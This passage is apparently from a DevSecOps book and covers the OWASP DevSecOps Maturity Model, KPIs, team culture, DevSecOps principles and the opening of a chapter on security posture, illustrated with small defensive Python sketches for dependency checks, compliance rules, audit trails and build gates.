An incredible maturity model has been created by an open source community to help understand the maturity of DevSecOps: the Open Web Application Security Project (OWASP) DevSecOps Maturity Model (OWASP DSOMM – https://owasp.org/www-project-devsecops-maturity-model/). The maturity model (https://dsomm.owasp.org) has the following levels:


Figure 1.6: Maturity model


Many organizations have come up with maturity models that start from either level 0 or level 1. The model we’ll be looking at describes four levels of maturity for DevSecOps within organizations. There are many dimensions under the different categories, covering the level of maturity in the build process, testing artifacts, pinning artifacts, SBOM components, and much more. Let’s take a closer look.

Maturity level 1

Maturity level 1, within the context of the OWASP DevSecOps maturity model, represents the foundational stage of implementing security practices in your DevOps process. It’s the initial step that’s taken toward integrating DevSecOps into your organization. Maturity level 1 is where you lay the groundwork. You’re getting the team to start thinking about security, but you haven’t gone full Mission Impossible on it.

Think of maturity level 1 like your first day at the gym. You’re not lifting the heavy weights just yet; you’re learning the ropes and maybe doing some light cardio. Similarly, at level 1, you’re just getting started with integrating security into your DevOps process. It’s less about having airtight defenses and more about setting the stage: think basic security checks, simple monitoring, and everyone still getting to know each other’s roles. Here’s what typically happens at this level:

• Security practices: Basic security protocols and practices have been established, but they are manually executed. The methods that are employed are typically straightforward and may not fully cover all security needs. While these practices are in place, they require considerable human effort and manual intervention, which could lead to inconsistencies and errors.
• Process initiation: At this level, teams start to recognize the importance of integrating security into the development process. However, practices are not yet fully structured or systematic.
• Education: The team might begin learning about security threats and how to prevent them. However, education and training in secure coding practices might not be comprehensive.
• Risk awareness: There’s a growing awareness of the potential risks of not integrating security fully into the DevOps process. The need for improvement is recognized, leading to the exploration of automated security measures.
• Automation: While the goal of DevSecOps is to automate as many security processes as possible, at this stage, little to no automation of security tasks exists. Manual work is predominant, which can be laborious and time-consuming.
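As one example of moving a manual level 1 check toward automation, the sketch below flags unpinned dependencies in a requirements-style file. The sample file content is invented purely for illustration:

```python
import re

def unpinned_dependencies(requirements_text):
    """Return dependency names that are not pinned to an exact version."""
    unpinned = []
    for line in requirements_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # skip blanks and comments
        if "==" not in line:
            # Grab the package name before any version specifier.
            name = re.split(r"[<>=!~\[]", line)[0].strip()
            unpinned.append(name)
    return unpinned

sample = """\
requests==2.31.0
flask>=2.0
pyyaml
"""
print(unpinned_dependencies(sample))  # ['flask', 'pyyaml']
```

Running a check like this in the pipeline replaces an error-prone manual review with a consistent, repeatable control – exactly the kind of small step that moves a team toward the next maturity level.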


Maturity level 2

Maturity level 2, in the context of the OWASP DevSecOps maturity model, signifies a progression from the initial stage of implementing DevSecOps in an organization. It’s the point where you start to incorporate and follow security best practices more systematically. Let’s take a deeper look at this level:

• Adoption of best practices: The organization starts to adopt recognized security best practices. These practices are likely documented and have become a standard part of the development process.
• Continuous security: Security practices are not only implemented but are now applied continuously throughout the DevOps pipeline. This means that the security controls are not just a one-time event, but are instead consistently applied throughout the SDLC.
• Partial automation: This level sees the introduction of automation, but it is not yet extensive. Certain tasks are likely automated to reduce manual effort, improve consistency, and mitigate human error. However, several security processes may still rely heavily on manual work.
• Regular training: At this stage, there is likely more emphasis on educating the development and operations teams about security threats, secure coding practices, and how to use any new security tools that have been introduced.
• Proactive security: There’s a shift toward a more proactive stance on security. Rather than just responding to security issues when they arise, teams are working to anticipate and prevent potential security issues.

Maturity level 3

Maturity level 3 within the OWASP DevSecOps maturity model marks a pivotal point in the evolution of an organization’s DevSecOps journey. It signifies the transition from just setting up DevSecOps practices to actively progressing toward their maturity. Level 3 comprises the following aspects:

• Advanced automation: The focus at this level is largely on automation. Most security practices are now automated, which reduces manual effort, increases efficiency, and minimizes human error. Security checks and protocols become an integral part of the entire software development pipeline.
• Integration of security: Security considerations are more thoroughly integrated into the DevOps process. This integration ensures that security is not an afterthought but a consistent theme from the very start of the SDLC.
• Proactive and continuous: At this level, security practices are not only proactive but also continuous. It’s not about implementing measures to fix issues as they arise but about embedding security practices to prevent issues from occurring in the first place.


• Regular reviews and updates: Security policies, practices, and automation scripts are regularly reviewed and updated to cope with emerging security threats and vulnerabilities. This keeps the security practices in line with the latest best practices.
• Enhanced training: There’s an increased focus on training, with development and operations teams regularly educated about current and emerging security threats. They are trained to use the latest security tools and follow updated secure coding practices.

Maturity level 4

At this level, the processes are established, and the focus shifts to continuous enhancement through automation and further process refinement.
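A team could roughly self-assess against these levels with a checklist. The practice names and the score-to-level mapping below are invented for illustration and are not the official DSOMM scoring:

```python
# Invented self-assessment: count which practices are in place and map
# the count to a rough maturity level (1-4). Not the official DSOMM scoring.
PRACTICES = [
    "basic_security_checks",      # level 1 territory
    "documented_best_practices",  # level 2
    "partial_automation",         # level 2
    "continuous_security",        # level 2/3
    "advanced_automation",        # level 3
    "regular_reviews",            # level 3
    "continuous_improvement",     # level 4
]

def maturity_level(in_place):
    """Map a set of practices that are in place to a rough level."""
    score = sum(1 for p in PRACTICES if p in in_place)
    if score <= 1:
        return 1
    if score <= 3:
        return 2
    if score <= 6:
        return 3
    return 4

print(maturity_level({"basic_security_checks"}))  # 1
```

Even a crude score like this is useful because it turns "where do we stand?" into a question that can be answered the same way every quarter.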

KPIs

KPIs help in measuring our goals and their priority, and they help us reach the point we wish to reach in the stipulated time. The whole DevOps or DevSecOps pipeline works in tandem to move to production; it is up to us where we want to take it. Before moving toward these KPIs, we must ask ourselves some questions:

• Are we testing all the application’s features before pushing them to security?
• Are we educating our developers about security processes and tools, rather than forcing security upon them?
• What software development processes are we following?
• Do we just follow the OWASP Top 10, or have we created a certain process for that?
• How frequently is security called in the SDLC?

All these questions take us to points where we can start thinking about taking our first step toward setting up the right processes and moving toward the best practices. Some of the key KPIs for DevSecOps processes are as follows:

• The amount of open source code used in the codebase – that is, third-party libraries and dependencies
• Where do we stand on automation processes?
• Are the tools aiding a smooth software pipeline?
• Are we able to reduce the bugs in the pipeline by fine-tuning it?
• How frequently are we fixing bugs?


These are just some of the parameters you need to consider; stay tuned for more detailed information.
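Several of these KPIs reduce to simple arithmetic once the raw numbers are collected. The figures below are made up purely for illustration:

```python
def third_party_ratio(third_party_loc, total_loc):
    """Share of the codebase made up of third-party code, as a percentage."""
    return round(100 * third_party_loc / total_loc, 1)

def mean_time_to_fix(fix_times_hours):
    """Average time to fix a bug, in hours."""
    return sum(fix_times_hours) / len(fix_times_hours)

# Invented numbers: 85,000 of 100,000 lines come from third-party dependencies,
# and the last four bugs took 4, 10, 16, and 2 hours to fix.
print(third_party_ratio(85_000, 100_000))  # 85.0
print(mean_time_to_fix([4, 10, 16, 2]))    # 8.0
```

Tracking numbers like these over time – rather than as one-off snapshots – is what turns them into KPIs.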

DevSecOps – the people aspect

When we talk about DevSecOps, the focus is often on processes and tools, but people – the team members involved in implementing and managing DevSecOps – are a crucial part of this equation. In simple terms, the “people aspect” of DevSecOps is all about how individuals within an organization understand, adopt, and execute the principles and practices of DevSecOps. The following are the main elements of the people aspect of DevSecOps:

• Collaboration: In DevSecOps, development, security, and operations teams need to work together closely. This might be a shift from traditional ways of working, where these groups often worked in silos. Regular communication and collaboration become key.
• Shared responsibility: In the DevSecOps world, everyone shares responsibility for security – it’s not just the job of the security team. Developers, operations personnel, and others all have roles to play in maintaining security.
• Education and training: People need to know about the importance of security and how to incorporate it into their daily work. This involves ongoing training about security threats, safe coding practices, using security tools, and more.
• Culture shift: Adopting DevSecOps often involves a cultural shift within an organization. It requires moving toward a culture that values transparency, shared responsibility, continuous learning, and a proactive approach to security.
• Empowerment: Team members should feel empowered to make decisions related to security, and should feel comfortable reporting potential issues. This requires an environment of trust and openness, where people aren’t blamed for mistakes but are encouraged to learn from them.
• Skills and expertise: As security practices become more integrated into the development process, team members might need to develop new skills and expertise. This might involve learning about new tools, technologies, or methodologies.
The people aspect of DevSecOps is all about creating an environment where everyone in the team understands the importance of security, is capable of contributing to it, and is committed to maintaining it as a collective responsibility. It’s about fostering a culture of collaboration, learning, and shared accountability for security. We will discuss this in more detail in the upcoming chapters.


Summary

DevSecOps means we’re incorporating security considerations from the very beginning, not just tackling them at the end of the SDLC. With this approach, each stage of the development process must include security as a fundamental component. DevSecOps actively brings these ideas to life and assists organizations in developing applications that are secure by default.

What we’re talking about here is a reshaped way of handling the SDLC – and it’s known as DevSecOps. Traditionally, security was never given priority, and developers were rarely properly educated about it. With DevSecOps, the two go hand in hand. Understanding our current maturity level gives us a sense of where we stand, and tracking KPIs allows us to measure our progress – to see where we were and where we are now, and to chart a path toward where we want to be.

Think and act

Answer the following questions to test your knowledge of this chapter:

• What is DevSecOps? Think about this from your own experience.
• Does DevSecOps change the way you work?
• Who contributes to the DevSecOps program?

Part 2: DevSecOps Principles and Processes

This part covers the basic DevSecOps principles and processes involved in setting up a program, without which we cannot achieve our goal of implementing DevSecOps. This part has the following chapters:

• Chapter 2, DevSecOps Principles
• Chapter 3, Understanding the Security Posture
• Chapter 4, Understanding Observability
• Chapter 5, Understanding Chaos Engineering

2 DevSecOps Principles

In this chapter, we will compare DevSecOps principles to traditional application security procedures. DevSecOps principles are the key concepts that can help us adopt a DevSecOps program at any point in its life cycle and take it to the maturity stage.

DevSecOps is a philosophy that blends software development (Dev), security (Sec), and operations (Ops) into a single, unified process. The ultimate goal of DevSecOps is to embed security practices into every stage of the software development process, fostering a culture of shared responsibility for security among all team members.

DevSecOps is like a buddy system for your code – everyone’s got a hand in keeping it safe. Think of it as turning your tech team into a neighborhood watch, where everyone’s on the lookout, not just the “security cops.” As for “shift left,” it’s all about tackling trouble before it grows into a full-blown crisis. Picture it like catching a typo before hitting “send” on an important email. The sooner you spot it, the less of a mess you have to clean up later!

Automation plays a pivotal role in DevSecOps, with security checks being automated and integrated into the development pipeline, reducing the possibility of human error and improving consistency. The DevSecOps philosophy promotes continuous security, analogous to continuous integration or delivery, with regular incremental enhancements to security controls and rapid response to security issues. Open and collaborative communication between Dev, Ops, and Sec teams is also championed in this approach, enabling effective understanding and implementation of security across all project stages. DevSecOps encourages the practice of security as code, wherein security policies, controls, and tests are codified and tracked through version control systems, ensuring easy replication and traceability.
In this chapter, we will cover the following topics: • DevSecOps principles • Challenges within the DevSecOps pipeline that principles can resolve



DevSecOps principles

DevSecOps practices concentrate on breaking down silos, enhancing collaboration, and, last but not least, shifting security left to integrate it early in the development process, before code moves on to production. Let’s deep dive into some key principles of DevSecOps:

• Unifying the CI/CD pipeline
• Fail fast
• Automation and innovation in DevSecOps
• Introducing compliance checks
• Empowering teams to make decisions
• Cross-skilling and educating teams
• Proper documentation
• Relevant checkpoints
• Building and managing secure Dev environments and toolchains

Let’s look at them in detail.

Unifying the CI/CD pipeline

The sooner we can unify the CI/CD pipeline’s needs, the earlier we can enforce security controls. At the same time, we should ensure we understand what is needed across the whole pipeline – that is, the tools, technology, and processes. We need to have appropriate controls in place for the pipeline and make sure everyone is aligned with them. Teams should not bring individual, ad hoc controls into the pipeline, as this will only ensure failure. Too many cooks spoil the broth.

Identify and analyze third-party component dependencies within application code

A DevSecOps toolchain provides you with the tools, approaches, and analytics to target dependencies in the software code flowing through your software supply chain:

• Enforce software container scanning using software composition analysis (SCA) tooling at critical points across your supply chain, such as when you’re verifying the containers in your private repository
• Investigate the code dependencies declared in manifest or lock files
• Track and analyze dependencies that your build process pulls into the prod environment
• Examine build artifacts before they enter your private repository


• Raise the profile of the software bill of materials (SBOM), which suitably targeting software dependencies makes ever more important as a rich software supply chain security standard

Effectively using DevSecOps collaboration also breaks down DevOps supply chain barriers. DevSecOps liberates every organization’s security team from being the last stop before production; instead, it frees them to be more proactive at earlier stages of the software supply chain via frameworks, automated testing, and improved processes. Cooperating with the security team addresses other aspects of software security as well, because they will deal with some additional considerations:

• Installing open source software securely in the supply chain
• Intaking third-party vendor technologies while preserving security and compliance
• Cooperating with contractor and partner security teams to incorporate their code into the final product
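As a rough illustration of the dependency-analysis idea above, the following Python sketch checks pinned dependencies from a simplified lock file against a hypothetical advisory list. The package names, versions, and advisory data are all invented for illustration; real SCA tooling works against curated vulnerability databases and real lock-file formats.

```python
# Sketch: flag third-party dependencies that appear in a known-vulnerability
# list. The lock-file format and advisory data are simplified stand-ins
# for real SCA tooling output.

# Hypothetical advisory database: package name -> known-vulnerable versions
ADVISORIES = {
    "libalpha": {"1.0.0", "1.0.1"},
    "libbeta": {"2.3.0"},
}

def parse_lock_line(line):
    """Parse a 'name==version' pin into a (name, version) tuple."""
    name, _, version = line.strip().partition("==")
    return name, version

def find_vulnerable(lock_lines):
    """Return the pinned dependencies that match a known advisory."""
    findings = []
    for line in lock_lines:
        if not line.strip():
            continue
        name, version = parse_lock_line(line)
        if version in ADVISORIES.get(name, set()):
            findings.append((name, version))
    return findings

lock_file = ["libalpha==1.0.1", "libbeta==2.4.0", "libgamma==0.9.0"]
vulnerable = find_vulnerable(lock_file)
```

Run at commit time or in the build stage, a check like this is what lets the pipeline block artifacts whose dependencies carry known vulnerabilities before they reach a private repository.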

Fail fast

Failing fast is the way to true innovation – it helps you understand why something works or doesn’t work, and then learn from it to unravel problems faster and better. Fail fast is an empowering concept if done right; it even has the power to transform a company. Failing fast is different from absolute failure. It’s important to differentiate between absolute failure and sending a message that experimentation is OK.

Typically, people used to work on releases for a year or a few months, which, in turn, led to the redundancy of a few modules. If the modules are redundant by the time the code is ready, it is only going to lead to a disaster. Now, the paradigm is shifting toward DevSecOps and multiple releases in a day. This allows us to understand and think about what is working and what is not, and helps us shift our vision and path for the development process. Failing fast is also about testing whether you have a good enough solution on which to base a decision.

Automation and innovation in DevSecOps

The best tools money can buy won’t help with DevSecOps if your team isn’t working together, and even the most cooperative team won’t help if you don’t have the right tools – not all tools are DevSecOps-ready, and not every tool can be used within a pipeline. To facilitate rapid development, innovation, and provisioning, security practices must keep up with the agile pace of the cloud era:

• Planning cycles are shorter, with more frequent deployments and more iterations as required
• Deployments are becoming smaller and follow a more standardized approach through consistent pipelines




• A reduction in time from build to deployment is being enabled by automation and self-service
• Silos are being removed from Dev and Ops teams to align their objectives and increase cohesion

A compartmentalized way of thinking not only undermines the DevOps culture but also weakens the organization’s overall security posture. The secret is to reduce process friction to a minimum. Any organization’s processes are carried out by people. DevSecOps processes, which aim to reduce the enterprise attack surface and enable effective management of technical security debt, are carried out by people using technologies. Challenging the status quo is among DevSecOps’ most crucial components.

Introducing compliance checks

Compliance is a critical component of DevSecOps that ensures that software development practices adhere to established standards, rules, and laws, such as HIPAA, GDPR, and others. Integrating compliance checks into the DevSecOps pipeline allows for continuous verification that software is being developed as per regulatory standards, industry guidelines, and best practices. Let’s review some of them:

• Automated compliance checks: Compliance checks should be automated as much as possible and incorporated into the CI/CD pipeline. By doing this, you can ensure that any compliance issues are caught early in the development cycle, making them easier and cheaper to rectify. Automated compliance checks can include everything from static code analysis and dynamic scanning to configuration management and policy enforcement.

• Continuous monitoring and auditing: Continuous monitoring and auditing of software development practices is crucial to maintaining compliance. This includes not just the code base, but also the tools, systems, and practices used in development. Automated auditing tools can be used to regularly check and report on compliance status.

• Compliance as code: Just like security as code, compliance can also be defined and managed as code. This involves codifying compliance requirements into executable scripts or configuration files that can be applied across the development environment. This approach not only provides a clear and precise representation of compliance requirements but also allows for easy replication and traceability.

• Shift-left compliance: Similar to security, compliance can be shifted left as well. (By contrast, applying compliance via hardening scripts post-deployment is known as shifting right.) By shifting left, developers can design and build software with compliance in mind from the outset, rather than having to retrofit it later.
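The “compliance as code” idea can be sketched as executable checks. In this hypothetical Python example, each rule is a named predicate applied to a deployment configuration; the rule names and configuration keys are illustrative assumptions, not drawn from any real compliance framework.

```python
# Sketch: "compliance as code" as executable checks. Rule names and the
# configuration shape are illustrative, not tied to any real framework.

COMPLIANCE_RULES = [
    ("encryption-at-rest", lambda cfg: cfg.get("storage_encrypted") is True),
    # Note: string comparison is a simplification that works for
    # single-digit version strings like "1.2"; real checks parse versions.
    ("tls-required", lambda cfg: cfg.get("min_tls_version", "") >= "1.2"),
    ("audit-logging", lambda cfg: cfg.get("audit_log_enabled") is True),
]

def check_compliance(config):
    """Run every codified rule against a deployment config and
    return the names of the rules that failed."""
    return [name for name, rule in COMPLIANCE_RULES if not rule(config)]

service_config = {
    "storage_encrypted": True,
    "min_tls_version": "1.0",   # violates the TLS rule
    "audit_log_enabled": True,
}
failures = check_compliance(service_config)
```

Because the rules live in code, they can be version-controlled, reviewed, and replicated across environments – exactly the traceability benefit described above.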


Empowering teams to make decisions

Giving developers, operations personnel, and security teams the freedom to make decisions that influence the design, implementation, and maintenance of software systems is referred to as “empowering teams to make decisions” in the context of DevSecOps principles. This method encourages a culture of shared accountability, where everyone is responsible for the system’s security, from code development through deployment and continuous maintenance:

• Autonomy: Give each member of your team the freedom and trust to make decisions for themselves. This implies that they don’t require approval for everything. Let them use their knowledge, since they are the best in their field.

• Communication: Ensure that everyone gets the knowledge necessary to make wise judgments. This entails maintaining open lines of communication and promoting knowledge sharing. The Dev and Ops teams should be informed if the security team comes across a new threat.

• Education: Give your teams the information and instruction they need to comprehend how their choices may affect security. A developer can choose more effectively how to write code if they are aware of potential security threats.

• Responsibility: Encourage each team member to accept ownership of the software’s security. Everyone is more inclined to prioritize security if they believe it to be part of their duties.

• Feedback: Create a culture where input is welcomed and taken into consideration.

Cross-skilling and educating teams and the cultural aspect approach

DevSecOps isn’t just about new tools and protocols; it’s about building a squad where everyone’s a stakeholder in the game of security. And remember, it’s not a one-and-done deal; it’s an ongoing jam session.

Before diving in, the whole team should get comfy with the security gadgets and gizmos. Pick tools that developers will find as easy to use as their favorite apps. The goal is a smooth, not clunky, partnership between Dev and Sec. We must budget for some real-deal training. We’re all owners of the security castle here, so we must arm everyone with the keys (and know-how) to keep it safe.

Success in DevSecOps is about more than just tech; it’s about vibing as a team and sharing the same ethos. If the culture doesn’t jibe with the DevSecOps groove, you’re trying to mix oil and water. It’s like a band – everyone has to be in sync; otherwise, the music will be off. Your strategies and rules need to be aligned like stars in a constellation. A regular health check ensures we’re not just meeting the goals but nailing them consistently. Get everyone on the same game plan, or it’s game over.




Invite security to the kickoff party for any DevOps project. Early chit-chats and planning set the stage for secure code that’s written like a best-seller from day one. Security hasn’t always been the star player in the app development game. Some fresh training can turn developers into all-around MVPs, rocking both code and security.

Proper documentation

Think of documentation as the ultimate playbook for your team. It’s not just the “who-did-what,” but the “why-they-did-it.” With a solid script, everyone knows their lines, making it easier to put on an award-winning performance in DevSecOps. In other words, a well-documented path is a treasure map for success. It helps the team navigate the what and why behind each decision, just like footnotes in a gripping novel. So, go ahead and document like you’re writing the next big blockbuster!

Let’s quickly learn why documentation is important:

• Code documentation: Clear comments within the code and detailed README files can help other developers understand the purpose of different parts of the code and how to use them.

• Design documentation: This captures the architectural decisions, the rationale behind choosing a particular technology stack, or how different systems interact with each other. For instance, a diagram showing how microservices interact in a distributed system can aid both developers and security teams in understanding potential security risks.

• Security policies and procedures: Documenting security policies and procedures ensures that everyone knows what is expected in terms of security practices. This might include guidelines on how to handle sensitive data, rules for password creation and storage, or procedures for reporting and responding to security incidents.

• Test and validation documentation: Test cases, test data, and test results should be thoroughly documented. This provides a historical record of what has been tested, how it was tested, and what the results were. For example, a report on a penetration testing exercise might include details of the methodologies used, the vulnerabilities found, and the remediation actions taken.

• Incident reports: When a security incident occurs, it’s crucial to document it thoroughly. This should include details of the incident itself, how it was discovered, how it was responded to, and what steps are being taken to prevent a similar incident in the future.

• Change management: Any changes to the system, especially those that affect security or compliance, should be documented. This can help trace back any issues to a particular change, making debugging and remediation easier.

• Audit trails: DevSecOps emphasizes the importance of having a solid audit trail – a log of actions taken by a system or user. Audit trails are especially valuable in the case of a security incident or during a compliance audit, as they can help determine who did what, when, and why.
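To make the audit-trail idea concrete, here is a minimal Python sketch of an append-only log recording who did what and when. The actors and actions are invented for illustration; in practice, audit records would go to tamper-evident, centralized storage rather than an in-memory list.

```python
from datetime import datetime, timezone

# Sketch: a minimal append-only audit trail recording who did what and when.
# Real systems write to tamper-evident, centralized storage.

class AuditTrail:
    def __init__(self):
        self._entries = []

    def record(self, actor, action, target):
        """Append an entry with a UTC timestamp."""
        self._entries.append({
            "when": datetime.now(timezone.utc).isoformat(),
            "actor": actor,
            "action": action,
            "target": target,
        })

    def by_actor(self, actor):
        """Answer 'who did what': all actions taken by one actor."""
        return [e for e in self._entries if e["actor"] == actor]

trail = AuditTrail()
trail.record("alice", "merged", "PR-101")
trail.record("bob", "deployed", "release-1.4")
trail.record("alice", "rotated", "api-key")
```

During a compliance audit or incident review, queries like `by_actor` are what turn the raw log into the “who did what, when, and why” answer the text describes.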


Relevant checkpoints

The shift-left approach emphasizes the importance of addressing issues earlier to reduce cost and time. Conducting preliminary vulnerability checks before committing code, rechecking them at build time, and having the capability to block components with serious vulnerabilities are all crucial. You can also monitor components within a repository post-release to update their usage status.

Developers who are new to the responsibility of their code’s security may not instantly possess the in-depth security expertise of seasoned white-hat hackers. However, investing in enhancing developers’ security knowledge and equipping them with the right tools benefits everyone. Offering secure templates and code samples that are confirmed secure is a good starting point. If something goes awry, the DevSecOps team can adopt a quality assurance mindset and prioritize security in fixing the issues. At the same time, security engineers can provide advice on best practices for coding applications and configuring infrastructure. This can help minimize flaws and guide corrective actions to fix any bugs found in subsequent testing stages.
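A checkpoint that blocks components with serious vulnerabilities might look like the following Python sketch. The CVSS-style scores, the threshold, and the component names are assumptions chosen for illustration, not output from any real scanner.

```python
# Sketch: a checkpoint that blocks a build when a component carries a
# vulnerability at or above a severity threshold. Scores are CVSS-style
# numbers; component data is illustrative.

BLOCK_THRESHOLD = 7.0  # block on "high" severity and above

def gate(components):
    """Split components into (allowed, blocked) lists based on each
    component's worst vulnerability score."""
    allowed, blocked = [], []
    for name, scores in components.items():
        worst = max(scores, default=0.0)  # no findings -> score 0.0
        (blocked if worst >= BLOCK_THRESHOLD else allowed).append(name)
    return sorted(allowed), sorted(blocked)

scan_results = {
    "auth-lib": [9.8, 5.0],   # critical finding -> blocked
    "ui-widgets": [3.1],
    "parser": [],
}
allowed, blocked = gate(scan_results)
```

Wired into the build stage, a gate like this is the mechanism behind “the capability to block components with serious vulnerabilities” described above.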

Building and managing secure Dev environments and toolchains

To support DevSecOps industrialization, future development environments must have security standards and guidelines integrated via the integrated development environment (IDE). Put together an onboarding program for developers that trains new hires on your work environments, tools, and procedures, along with the ITSec policies. Over and above the onboarding training, offer the developer team refresher courses and ongoing instruction. With involvement from your Dev, Ops, and cybersecurity teams, security for your DevSecOps toolchain should be a constant priority.

Challenges within the DevSecOps pipeline that principles can resolve

With Dev, Ops, and Sec, we’ve got a lot of hands touching the code. This could create chaos, but DevSecOps makes sure everyone’s working from the same recipe. Shared responsibility means less finger-pointing and more high-fiving.

Traditional models often slap on security measures at the end, making it a frantic game of catch-up. DevSecOps principles such as shift left say, “Why wait?” By baking security in from the get-go, you’re not just avoiding a disaster – you’re planning for success.

No one likes to be bogged down by bureaucratic procedures when you’re trying to move fast. DevSecOps helps by automating security protocols. This means you can sprint without tripping over paperwork. Also, the Dev team and the Sec team sometimes seem like they’re speaking different languages. DevSecOps bridges this gap, turning that miscommunication into a harmonious duet. When everyone’s on the same page, it’s easier to belt out hits.




Let’s look at the different challenges in detail.

Continuous application changes

In DevSecOps, one of the major challenges is managing continuous application changes. These changes occur due to the iterative and dynamic nature of DevOps practices, where updates and modifications to the code occur frequently and consistently. The following details provide a deeper understanding of this challenge:

• High-speed iterations: DevOps practices encourage rapid development and deployment, which can lead to frequent changes in the application. While this can enhance efficiency and responsiveness, it also introduces a risk of security vulnerabilities being overlooked in the process.

• Integration complexity: With the application continually evolving, integrating new features or code changes can become complex. Each integration has to be checked for potential security risks to ensure that new vulnerabilities aren’t introduced into the existing system.

• Change management: The dynamic nature of the application requires effective change management. A slight oversight can lead to inconsistencies or malfunctions within the application, or even worse, expose new security loopholes.

• Dependent systems: Frequent changes can affect dependent systems or components, potentially breaking their functionality or exposing them to security risks.

• Continuous testing: With continuous changes, the application needs to be continuously tested to ensure that new features or modifications do not introduce security vulnerabilities. This can be resource-intensive and may cause delays if it’s not done in an automated and efficient manner.

The developer knowledge gap

With cybersecurity and data protection being prioritized over the last decade, it might be reasonable to assume that developers already follow secure coding practices. In reality, many do not, and this knowledge gap is an obstacle to any attempt to move security left. Your DevSecOps approach therefore requires managing it using a combination of the following:

• Application security (AppSec) training
• Security champions – developers trained to sit within a development team to mentor and assist with secure development and mitigation activities


Lack of AppSec tool integration

A significant hurdle within the DevSecOps pipeline is the lack of proper integration of AppSec tools. This problem arises due to various factors and has several implications, as explained here:

• Limited coverage: AppSec tools are essential for identifying security vulnerabilities in your applications. However, without proper integration into the DevSecOps pipeline, these tools may not provide complete coverage for your applications. This can result in unidentified vulnerabilities that can be exploited by attackers.

• Workflow disruption: Without seamless integration, security tools might disrupt the DevOps workflow. For instance, developers may have to manually initiate scans or interpret results, which takes time away from coding and other crucial tasks. This disruption can slow down the development process and create friction between the Dev and Sec teams.

• Delayed feedback: If security tools aren’t fully integrated into the pipeline, there could be significant delays in receiving feedback about potential security issues. This delay means that developers might have already moved on to other tasks before learning about vulnerabilities that need to be addressed, making it harder and more time-consuming to correct the issues.

• Reduced efficiency: Without the proper integration of AppSec tools, teams may need to spend unnecessary time and effort on tasks that could be automated, such as manually triggering scans or sorting through false positives. This extra work reduces the team’s efficiency and can lead to slower delivery times.

• Inconsistent use: If AppSec tools aren’t an integral part of the DevSecOps pipeline, their use may become inconsistent. Some developers may skip using the tools due to time constraints or forgetfulness, leading to potential vulnerabilities going undetected.

Summary

In the realm of software development, an imaginary organization, TechFuture, has been creating innovative applications. The company realized that integrating security throughout its development life cycle could dramatically improve its products and minimize vulnerabilities, so it decided to implement DevSecOps principles. By embracing these principles, TechFuture is able to build more secure applications, respond more quickly to security incidents, and foster better collaboration among its teams. TechFuture learned that DevSecOps is not just about tools and processes, but about a cultural shift toward shared responsibility and proactive security practices.

In this chapter, we explored the different DevSecOps principles and learned about the challenges within the DevSecOps pipeline. In the next chapter, we will look at understanding the security posture.


3 Understanding the Security Posture

DevSecOps is an increasingly critical area for organizations. Every organization wants to shift toward using DevSecOps processes, tools, and technologies. The immense changes in applications and code have led to a big change in the way we work with code, and stakeholders want new functionalities and features at lightning speed. However, while we are shifting gears toward DevSecOps, we need to look at the bigger picture.

While transitioning to a cloud-native approach offers advantages, it also introduces significant risks. Because we are adopting it at lightning speed, we often miss out on understanding what goes into designing a secure environment. Now that we are talking about the Internet of Things (IoT), Operational Technology (OT), and ever-growing dependencies, it becomes imperative to understand the ecosystem very well. For example, let’s say we have a house with four doors and four windows. It is important to understand the risks behind leaving any of these open. Likewise, it is important to understand the code that is built in-house and the code that is open source. This also includes third-party vendors, tools, APIs, and any microservices in use.

While being part of the Dev team as well as the Sec team, I got the opportunity to understand how the ecosystem works, as well as the friction between both teams. The Dev team needs to understand security in the ecosystem; otherwise, the Sec team ends up being the showstopper. If we need to get things streamlined, everyone (the DevOps, Sec, and QA teams) needs to work together. That, in turn, means understanding where we stand in terms of vulnerabilities.



Developers are expected to have a comprehensive understanding of both development and security aspects, including the following:

• Security tools
• New vulnerabilities
• Tracking to fix security bugs

This can only be done when we have the right information about the security posture within the organization, as well as what assets and code we have within the organization. We will cover the following main headings in this chapter:

• Understanding your security posture
• Why and what measures we take to secure the environment
• What measures can we take to monitor an environment?
• Where does security stand in the whole development process?

Understanding your security posture

In DevSecOps, posture management focuses on identifying security issues and addressing unresolved concerns early:

• The development pipeline is an automated process that facilitates code deployment to production
• Within the deployment pipeline, we have steps defined to perform the actions needed to reach the production stage
• The development pipeline needs to be secured by understanding the right posture – that is, the tools, technologies, and people involved
• It entails understanding any associated third-party vendors or risks from those vendors

Regular meetings

DevSecOps pipelines are automated, but regular meetings among team members are essential for alignment and collaboration. A regular cadence helps us know where we stand, make sure we are on the right path, and stay on top of the development pipeline. At the same time, it is important to understand where to stop and change gears. You can’t move on until you find the puzzle piece that completes the picture.


Managing pipelines

Pipelines should be structured and managed like a story, with distinct chapters and subsequent pages. Likewise, a pipeline has multiple stages, and stages have different actions. It needs to be managed to give everyone the same view. We need to understand when a new page can be added to a chapter – that is, whether and when a tool can be added to a phase such as the code review process.

Testing pipelines

Test the pipeline to ensure you have a clear vision of what is working and what is not. Scanning applications in the functional testing stage is often called dynamic testing. This phase should not be a roadblock during the early stages. Instead, let the pipeline pass but keep the vulnerability report for fixes; with more maturity, the pipeline can be used to block vulnerabilities from going into production by breaking the build.
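This report-only-then-block progression can be sketched as a small policy function. The finding text and the choice of maturity level 3 as the point where findings start breaking the build are illustrative assumptions, not a prescription.

```python
# Sketch: a dynamic-testing step whose behavior depends on program
# maturity. Early on it only reports findings; later it breaks the build.
# The level-3 threshold is an illustrative assumption.

def evaluate_scan(findings, maturity_level):
    """Return (pipeline_passes, report). Below maturity level 3 the
    pipeline always passes and findings go into a report for later fixes;
    at level 3 and above, any finding fails the pipeline."""
    report = list(findings)
    if maturity_level >= 3 and report:
        return False, report
    return True, report

early = evaluate_scan(["SQLi in /login"], maturity_level=1)   # passes, reported
mature = evaluate_scan(["SQLi in /login"], maturity_level=3)  # blocks
```

Either way, the vulnerability report is kept, so nothing is lost while the program earns the trust needed to start breaking builds.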

Tools involved in pipelines

Effective tool management is crucial in DevSecOps to determine which tools are integrated into the CI/CD pipeline and which are used for offline analysis. For instance, secret scanning should be integrated as a pre-commit hook to prevent sensitive data from being committed.

Now, let’s understand why we must get into security posture management. Security posture management is a crucial component of any organization’s cybersecurity strategy. The term security posture refers to the collective security status of an organization’s software, data, networks, and computer systems. A strong security posture supports the identify, protect, detect, respond, and recover functions of an organization’s cybersecurity program. Let’s look at why it’s important to manage your security posture effectively.
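The pre-commit secret check mentioned above could be sketched as follows in Python. The two patterns are simplified examples (one AWS-access-key-shaped ID and one generic hardcoded password); production hooks rely on curated rule sets and entropy analysis rather than a couple of regexes.

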